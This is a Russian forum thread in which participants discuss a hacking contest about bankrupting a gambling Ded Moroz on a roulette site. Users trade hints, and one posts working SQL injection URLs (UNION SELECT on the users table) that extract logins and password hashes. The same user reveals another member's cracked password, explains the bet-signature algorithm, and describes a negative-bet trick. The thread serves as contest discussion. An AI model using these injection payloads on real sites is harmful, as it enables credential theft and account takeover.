Вобщем сегодня только попробовал конкурс от "Х". Забавы ради:

...Но вот какая незадача. Дед мороз подсел на азартные игры. Сидит и все время играет в рулетку, старый засранец. Недавно сорвал большой куш и теперь его невозможно отвлечь почти ничем.

В общем тебе опять надо спасать Мир. А заодно и деда Мороза - от человеческих пороков. Попробуй обанкротить азартного старика, чтобы ему не на что было играть. Тогда ты спасешь мир.

Подробнее: http://ired.inins.ru/ko/


З.Ы. к слову сказать уже на первых секундах пребывания на сайте я нашёл sql-injection... честно говоря не очень сложный конкурс, но нужно знать ActionScript...

Пробуйте ;)

-----
Nothing just happens. You choose it to happen.

| Сообщение посчитали полезным:

А ты умеешь компелировать слоет и соответсвенно немного шелкодеса?

| Сообщение посчитали полезным:

i]intty пишет:
А ты умеешь компелировать слоет и соответсвенно немного шелкодеса? [/i]

ты имеешь ввиду сплойт, а в нём шеллкод?

-----
Nothing just happens. You choose it to happen.

| Сообщение посчитали полезным:

он имеет ввиду BHC

-----
Никогда не делай то, что возможно. Стремись сделать то что невозможно впринципе!

| Сообщение посчитали полезным:

Viktoro пишет:
честно говоря не очень сложный конкурс, но нужно знать ActionScript...
Чета не видно твоего ника в топе ;)

| Сообщение посчитали полезным:

дело в том что это не топ прошедших, а топ для сбития с толку
З.Ы. если сдаётесь подскажу

-----
Nothing just happens. You choose it to happen.

| Сообщение посчитали полезным:

Viktoro пишет:
дело в том что это не топ прошедших, а топ для сбития с толку
Всмысле? А что сделать тогда надо? Нифига не сдаемся.

| Сообщение посчитали полезным:

Araсмени переменную "i" на 0 (ноль), будет весь список зареганых
http://ired.inins.ru/ko/top.php?i=0 http://ired.inins.ru/ko/top.php?i=0
Но чет Viktoro все равно там нет.

| Сообщение посчитали полезным:

Блин, тут флэшку разобрать надо или снифером?
а то я в энтом деле вообще чайник. ни разу не пробовал сайты ломать.

| Сообщение посчитали полезным:

alex111 пишет:
Araсмени переменную "i" на 0 (ноль), будет весь список зареганых
ЛОЛ. До такого я уж как-нить допер =)))
Ну и нафиг мне список зареганных? Я ваще смысла задачи не пойму. Сперва я думал, что надо выставить себе максимальный балл. Теперь хз.

| Сообщение посчитали полезным:

ггггг, у меня там ник был Dexter...
Ладно маааааленькая подсказка
ired.inins.ru/ko/top.php?i=1000 - это ссылка на топ, и если попробовать проверить этот скрипт на SQL-injection обычной кавычкой-результата не будет, а если так:
ired.inins.ru/ko/top.php ????????? попробуйте, а потом подумайте о чём это говорит ))))))
класный всё-таки конкурс, народ НЕ СДАВАЙТЕСЬ !!!!!

-----
Nothing just happens. You choose it to happen.

| Сообщение посчитали полезным:

Viktoro пишет:
Ладно маааааленькая подсказка
Ты считаешь всех идиотами чтоли? Это первое что было проверено. Я уже раза три спрашивал в чем смысл конкурса - внятного (да ваще никакого) ответа так и не получил.

| Сообщение посчитали полезным:

смысл обанкротить азартного старика, чтобы ему не на что было играть

-----
Nothing just happens. You choose it to happen.

| Сообщение посчитали полезным:

Хрень какая то В чём прикол ХЗ
Разобрать алго подписи ставок как два пальца... sgn = com.meychi.ascrypt.MD5.calculate(bet) + substring(com.meychi.ascrypt.MD5.calculate(p_pass), 0, 10);
ну а чтобы деньги не убавлялись, а наоборот прибавлялись, так можно к ставке приписать знак минус тем самым вы будете не проигрывать деньги, а наоборот их выигрывать.

С топом такая же лажа
ired.inins.ru/ko/top.php?i=100000000000 UNION SELECT login,2 FROM users /*
ired.inins.ru/ko/top.php?i=100000000000 UNION SELECT password,2 FROM users /*

если нужен конкретный юзвер, то так (пример ищем пароль Ara ;) без обид)
ired.inins.ru/ko/top.php?i=100000000000 UNION SELECT password,2 FROM users WHERE login=char(65,114,97) /*
В итоге получаем md5 хеш от пароля. После недолгих плясок с бубном получаем и пароль 54321.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

вообще-то прикол заключается в том, чтобы ПОЛУЧИТЬ ДОСТУП К АККАУНТУ ДЕДА МОРОЗА... НУ... И.... ОБАНКОТИТЬ, а не в том, чтобы "нарубить" побольше бабок в казино %)

причём пути не ограничены... хотя я знаю действующий только один...

[HEX] пишет:
если нужен конкретный юзвер, то так (пример ищем пароль Ara ;) без обид)
ired.inins.ru/ko/top.php?i=100000000000 UNION SELECT password,2 FROM users WHERE login=char(65,114,97) /*

красота ;) только я так не извращался, а вывел сразу все хэши, правда с limit 100...

-----
Nothing just happens. You choose it to happen.

| Сообщение посчитали полезным:

Viktoro
А зачем тебе все то? Каким образом определишь где чей хэш? Может аакаунт деда мороза находится в середине списка ;) И че будеш отсчитывать 321 строку например? Проще условие дописать WHERE login=char(100,101,97,100,95,109,111,114,111,122)

И если нужно обанкротить деда мороза, то нафига сделан топ который выводит всех юзверей у кого больше 1000 у.е. ?!

Я лучше Дедушку мороза обогачу деньгами Пускай в топе магнатов будет... гыгы

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

[HEX], респект! Не думал, 4то у нас кто-то всякими там sql-inj и XSS балуется ;)

-----
HOW MUCH BLOOD WOULD YOU SHED TO STAY ALIVE

| Сообщение посчитали полезным: